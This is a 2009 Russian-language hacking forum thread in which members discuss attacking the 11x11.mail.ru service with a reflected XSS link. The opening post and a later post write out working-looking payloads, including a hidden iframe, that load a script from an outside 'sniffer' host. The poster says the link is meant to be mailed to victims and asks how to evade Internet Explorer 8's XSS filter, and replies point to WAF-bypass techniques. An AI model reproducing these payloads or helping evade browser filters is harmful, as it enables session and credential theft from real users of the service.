XSS не пробивает Internet Exporer 7

Discussion in 'Уязвимости Mail-сервисов' started by Uex Urgent, 23 Dec 2009.

  1. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    463
    Reputations:
    452
    XSS не пробивает Internet Exporer 8

    Столкнулся с проблемой, что пассивка XSS не пробивает Internet Exporer 8

    PHP:
    http://11x11.mail.ru/?&url='"><script src=http://sniffer.ru/js.js></script>
    Блокируется выполнение сценариев

    [​IMG]


    кто как обходит защиту ИЕ 8 ?

    Запарился уже кодировать :mad: , все остальные браузеры пробивает, а на ИЕ 8 полный тормоз.
     
    _________________________
    #1 Uex Urgent, 23 Dec 2009
    Last edited: 24 Dec 2009
    1 person likes this.
  2. svesve

    svesve Elder - Старейшина

    Joined:
    15 Jun 2007
    Messages:
    574
    Likes Received:
    86
    Reputations:
    11
    зря пассивку спалил
    пофиксят
     
  3. n-000

    n-000 Elder - Старейшина

    Joined:
    25 Oct 2006
    Messages:
    90
    Likes Received:
    36
    Reputations:
    5
    пробывал тоже самое результата - ноль !
     
    1 person likes this.
  4. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Ого о_0 она все еще пашет... ей уже как месяца 2 о_0
     
  5. ntldr

    ntldr Elder - Старейшина

    Joined:
    4 Dec 2007
    Messages:
    367
    Likes Received:
    140
    Reputations:
    23
    одна найденная мной в теме куда скидывались XSS от мейлру когда-то год мне прослужила
     
  6. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    463
    Reputations:
    452
    пассивку свою я выкладывать не стал, а взял наугад из темы пассивные ксс, дабы палева меньше было. так что это палевная пассивка, приведенная чисто для примера.


    доберман, я прекрасно знаю, что у меня на скрине, а скрин сделал чтоб было общее понятие как блокируется.
    кажется или я вопрос неправильно поставил или мне загодя неправильно отвечают.

    смотри, я пытаюсь кодировать фрейм с пассивкой,
    PHP:
    <iframe width=1 height=1 style="position: absolute; visibility: hidden;" src="http://11x11.mail.ru/?&url='"><script src=http://sniffer.ru/js.js></script>"></iframe> 
    закодировать его в яваскрипт, и дальше уже запускать в теле страницы скриптом <script src=закодированный.js></script> ан не пробивает, все равно распознается XSS

    совет про отключение фильтра ваще не к месту))), иначе при отправке жертве письма с ксс, мне надо отправлять следующий текст "если у вас ИЕ 7-8, то отключите, пожалуйста, фильтр безопасности перед тем как перейдете по следующей ссылке." ? :D


    мне надо было заскринить весь инструктаж по ксс, который выводится при клике мышкой?


    весь вопрос заключается в том, как в ИЕ 8 запустить пассивную ксс при включенном фильтре, как заставить ссылку обработаться в ИЕ 8, а не в том, что такое ксс и с чем его кушать. :confused:

    ps. за ссылку спасибо, пошел читать, может найду что нибудь полезное.
     
    _________________________
    #6 Uex Urgent, 24 Dec 2009
    Last edited: 24 Dec 2009
  7. brain[pillow]

    brain[pillow] Active Member

    Joined:
    7 Nov 2008
    Messages:
    7
    Likes Received:
    103
    Reputations:
    74
    Обойти фильтр "при помощи js-обфускации" как советует товарищ dober.man не выйдет никоим образом. Ищите материал по обходу WAF (был то ли на конференции BlackHat, то ли в одном из отчётов об обходе WAF от Bitrix после проведения Chaos Constructions 2009). В нём было разобраны методы обхода mod_security, сухосин-патча и Анти-XSS фильтра в IE7. Ссылку дал бы, но не помню где :) Так что - ищите.
     
    1 person likes this.